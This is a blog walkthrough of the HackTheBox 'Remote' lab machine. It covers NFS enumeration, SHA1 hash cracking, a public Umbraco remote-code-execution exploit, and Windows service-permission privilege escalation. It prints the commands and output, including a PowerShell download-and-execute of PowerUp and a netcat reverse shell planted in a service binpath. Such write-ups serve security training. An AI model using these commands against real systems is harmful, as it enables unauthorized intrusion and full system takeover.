LifesFun's 101

"The only true wisdom is in knowing you know nothing." - Socrates

Remote Walkthrough

12 Sep 2020

Remote is a Windows-based vulnerable machine created by mrb3n for HackTheBox platform. This machine follows OSCP style in my opinion and experience. In the process of escalating privileges on this machine a user will practice enumerating NFS share, vulnerable web application and also practice password cracking skills. Once low privilege shell is obtained, one can exploit weak permissions of one of the services running on the system in order to get root level privileges.

Vulnerable System:

Operating System: Windows Server 2016

Kernel: N/A

Vulnerability Exploited: Remote Code Execution

Exploit Used: Umbraco RCE PowerShell Reverse Shell PoC

Proof of Concept Code:

Vulnerability Explained: The exploit takes advantage of vulnerability in Umbraco CMS, which allows remote code execution by sending a specifically crafted packet as authenticated user.

Vulnerability fix: Update to the latest version of software which does not contain the vulnerability.

Severity: Medium

Privilege Escalation Vulnerability: Weak Service Permissions

Exploit Used: N/A

Proof of Concept Code: wget “” -outfile “nc.exe” | sc.exe config UsoSvc binpath= “C:\inetpub\wwwroot\nc.exe -nv 8080 -e C:\WINDOWS\System32\cmd.exe” | net stop UsoSvc | net start UsoSvc | nc -nvlp 8080

Privilege Escalation Vulnerability Explained: A service is ran with SYSTEM privileges and weak permissions. It is possible for a regular user to modify the binary path of the service and execute any command on the system.

Vulnerability fix: Restrict who has permissions to modify, start or stop the service as per principle of least privilege.

Severity: High


  • Port Scanning (nmap)

  • Web Port Enumeration (Browser, Gobuster)

  • NFS Enumeraiton (showmount, mount, strings)

  • Hash Cracking (hashcat64)

  • Low Privilege Escalation (google, browser, RCE)

  • Privilege Escalation (PowerUp, sc.exe, nc)


Port Scanning (Nmap)

All Ports Scan.

root@lifesfun:~# nmap -sT -Pn -p- -oA allports

Nmap scan report for
Host is up (0.81s latency).
Not shown: 65514 closed ports
21/tcp    open  ftp
80/tcp    open  http
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
5985/tcp  open  wsman
26651/tcp open  unknown
37667/tcp open  unknown
47001/tcp open  winrm
48560/tcp open  unknown
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49678/tcp open  unknown
49679/tcp open  unknown
49680/tcp open  unknown
53747/tcp open  unknown
58453/tcp open  unknown

Aggressive, Version and Default Script Scan.

nmap -sV -sC -p 21,80,111,135,139,445,2049,5985 -oA sVsC
Nmap scan report for
Host is up (1.2s latency).

21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 5m48s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-21T17:40:02
|_  start_date: N/A

As per the scan a couple of interesting ports stand out, however only two of them can help to get low privilege shell. These are port 80 (HTTP) and port 5985 (NFS share)

Web Port Enumeration

Screenshot below shares homepage of the application hosted n the webserver. After briefly poking around nothing interesting has been found.

Gobuster then was used to find directories not directly accessible through the website’s interface.

root@lifesfun:~# gobuster dir -u -w /usr/share/wordlists/dirb/common.txt 
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/08/26 19:29:20 Starting gobuster
/about-us (Status: 200)
/blog (Status: 200)
/Blog (Status: 200)
/Contact (Status: 200)
/contact (Status: 200)
/home (Status: 200)
/Home (Status: 200)
/install (Status: 302)
/intranet (Status: 200)
/people (Status: 200)
/People (Status: 200)
/person (Status: 200)
/products (Status: 200)
/Products (Status: 200)
/umbraco (Status: 200)
2020/08/26 19:30:58 Finished

One directory that stood out was umbraco. Umbraco is an open source content management system. The screenshot below shows the authentication page for the newly found application.

NFS Enumeration

For NFS enumeration showmount utility, which queries remote system for information about the NFS shares, can be used.

root@lifesfun:~# showmount -e
Export list for
/site_backups (everyone)

Once the shares available on the systems are known, mount command can be used to mount remote share on the attacker machine. First a directory needs to be created that the remote share will be mounted to, after that the remote share can be mounted to that directory as per commands below.

root@lifesfun:~# mkdir /tmp/infosec

root@lifesfun:~# mount -t nfs /tmp/remote/

Now that the share is mounted, it can be enumerated locally.

root@lifesfun:~# cd /tmp/remote

root@lifesfun:~# ls
App_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config

After doing some research, it has been found that umbraco stores various information in its database. The database is located in App_Data folder in a file called Umbraco.sdf

root@lifesfun:~# cd App_Data

root@lifesfun:~# ls
cache  Logs  Models  packages  TEMP  umbraco.config  Umbraco.sdf

Strings utility can be used to partially enumerate the contents of the database. Only a few top lines are shown below.

root@lifesfun:~# strings Umbraco.sdf 

It looks like there are a few lines with what could be a username and a hashed password - admin:b8be16afba8c314ad33d812f22a04991b90e2aaa . The algorithm used to hash the password is SHA1.

Hash Cracking

Hashcat can be used to obtain the password from the hash shown above.

.\hashcat64.exe -m 100 -a 0 .\remote.txt .\rockyou.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: NVIDIA Corporation
* Device #1: GeForce, 1024/4096 MB allocatable, 5MCU

OpenCL Platform #2: Intel(R) Corporation
* Device #2: Intel(R) HD Graphics, skipped.

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Watchdog: Temperature abort trigger set to 90c

Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

Driver temperature threshold met on GPU #1. Expect reduced performance.

Session..........: hashcat
Status...........: Cracked
Hash.Type........: SHA1
Hash.Target......: b8be16afba8c314ad33d812f22a04991b90e2aaa
Time.Started.....: Sun Aug 23 12:57:06 2020 (1 sec)
Time.Estimated...: Sun Aug 23 12:57:07 2020 (0 secs)
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  8595.7 kH/s (2.65ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 9830400/14344384 (68.53%)
Rejected.........: 0/9830400 (0.00%)
Restore.Point....: 9502720/14344384 (66.25%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: bounty11 -> babypolk07
Hardware.Mon.#1..: Temp: 48c Util: 42% Core:1468MHz Mem:2504MHz Bus:16

Driver temperature threshold met on GPU #1. Expect reduced performance.
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => Started: Sun Aug 23 12:56:59 2020
Stopped: Sun Aug 23 12:57:08 2020


Now there’s a username and a password that can be used - admin:baconandcheese.

Low Privilege Exploitation

Upon logging in, the version of the application has been discovered. This can be used to find an exploit.

A quick google search presents a number of exploits available.

Jonoans’ exploit has been chosen and downloaded from github as per commands below.

root@lifesfun:~# git clone
Cloning into 'Umbraco-RCE'...
remote: Enumerating objects: 29, done.
remote: Counting objects: 100% (29/29), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 29 (delta 13), reused 23 (delta 7), pack-reused 0
Unpacking objects: 100% (29/29), 14.54 KiB | 465.00 KiB/s, done.

root@lifesfun:~# pip3 install -r requirements.txt

After all of the requirements have been installed, the exploit is ran, the reverse shell has been established and the user flag obtained.

root@lifesfun:~# python3 -u admin@htb.local -p baconandcheese -w '' -i
[+] Trying to bind to on port 4444: Done
[+] Waiting for connections on Got connection from on port 49697
[+] Trying to bind to on port 4445: Donewi
[+] Waiting for connections on Got connection from on port 49698
[*] Switching to interactive mode
PS C:\windows\system32\inetsrv> type C:\Users\Public\user.txt

Privilege Escalation

For privilege escalation PowerUp, a script written by HarmJ0y, is used for quick enumeration of some easy vectors. It presents us a service with weak permissions.

PS C:\windows\system32\inetsrv> IEX (New-Object Net.WebClient).DownloadString('')
PS C:\windows\system32\inetsrv> Invoke-AllChecks

[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...

[*] Checking for unquoted service paths...

[*] Checking service executable permissions...

[*] Checking service permissions...
[*] Use 'Invoke-ServiceUserAdd -ServiceName SVC' or 'Invoke-ServiceCMD' to abuse

[+] Vulnerable service: UsoSvc - C:\Windows\system32\svchost.exe -k netsvcs -p

[*] Checking for unattended install files...

[*] Checking %PATH% for potentially hijackable .dll locations...

[*] Checking for AlwaysInstallElevated registry key...

[*] Checking for Autologon credentials in registry...

[*] Checking for encrypted web.config strings...

[*] Checking for encrypted application pool and virtual directory passwords...

To abuse these permissions netcat is downloaded to the vicitm’s system as shown below.

PS C:\windows\system32\inetsrv> cd C:\inetpub\wwwroot
PS C:\inetpub\wwwroot> wget "" -outfile "nc.exe"

Once the netcat is downloaded, sc.exe can be used to modify binpath of the service and insert above download nc executable with reverse shell command pointing to the attacking machine.

PS C:\inetpub\wwwroot> 
sc.exe config UsoSvc binpath= "C:\inetpub\wwwroot\nc.exe -nv 8080 -e C:\WINDOWS\System32\cmd.exe"
[SC] ChangeServiceConfig SUCCESS

After the modifications to the service are done the service needs to be restarted. However, before restarting the service make sure that netcat is listening on the attacker machine. As shown below, first stop the service and then start the service again.

PS C:\inetpub\wwwroot> net stop UsoSvc
The Update Orchestrator Service service is stopping.
The Update Orchestrator Service service was stopped successfully.

PS C:\inetpub\wwwroot> net start UsoSvc

Once the service is restarted the reverse shell command should be executed with netcat on victim’s machine and the netcat on attacker’s machine should receive it as show below.

root@lifesfun:~# nc -nvlp 8080
listening on [any] 8080 ...
connect to [] from (UNKNOWN) [] 49757
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt

comments powered by Disqus